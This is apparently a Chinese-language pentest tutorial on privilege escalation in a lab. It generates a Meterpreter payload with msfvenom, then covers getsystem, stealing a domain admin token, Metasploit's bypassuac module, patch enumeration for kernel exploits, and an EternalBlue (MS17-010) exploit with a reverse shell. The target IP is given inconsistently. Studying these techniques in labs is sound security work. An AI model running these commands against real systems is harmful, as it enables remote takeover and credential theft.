1. 环境搭建
攻击主机:
- Kali Linux 172.16.243.132
目标主机:
- Windows 7 172.168.243.131
2. 上传Shell并连接
<code>msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=172.16.243.132 -f exe > shell.exe use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set LHOST 172.16.243.132 run</code>
成功建立正向Shell连接,通道已打开。
3. Meterpreter基础提权
3.1. 基础提权
在Meterpreter会话中,使用以下命令可实现自动提权:
getsystem
自动提权成功。
查看当前用户权限:
getuid
此时用户权限为SYSTEM。
3.2. 盗取用户进程令牌
通过Meterpreter会话执行ps
命令查看当前进程:
ps
假设我们找到了一个域管理员运行的进程,其进程PID为2548:
steal_token 2548
成功盗取了域管理员的令牌,权限得到短暂提升。
3.3. 内置多个BypassUAC脚本
Metasploit内置多个BypassUAC脚本,使用方法类似,成功运行后会返回一个新的会话,需再次执行getsystem
获取系统权限。
例如:
<code>use exploit/windows/local/bypassuac run</code>
3.4. 内核提权
连接Shell后,使用enum_patches
模块收集补丁信息:
use post/windows/gather/enum_patches
根据具体的补丁信息选择相应的payload荷载进行利用。
4. 溢出漏洞模块提权
针对MS17-010漏洞进行攻击:
<code>use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS 172.16.243.131 run</code>
成功利用MS17-010漏洞,建立连接。
可以使用migrate
命令将当前会话迁移到SYSTEM权限进行的进程。
5. 总结
以上便是Meterpreter提权的基本方法和一些常用技巧。在渗透测试中,根据具体情况选择合适的提权方式非常重要,有时也需要结合多种方法来实现最终的目标。
© 版权声明
THE END
暂无评论内容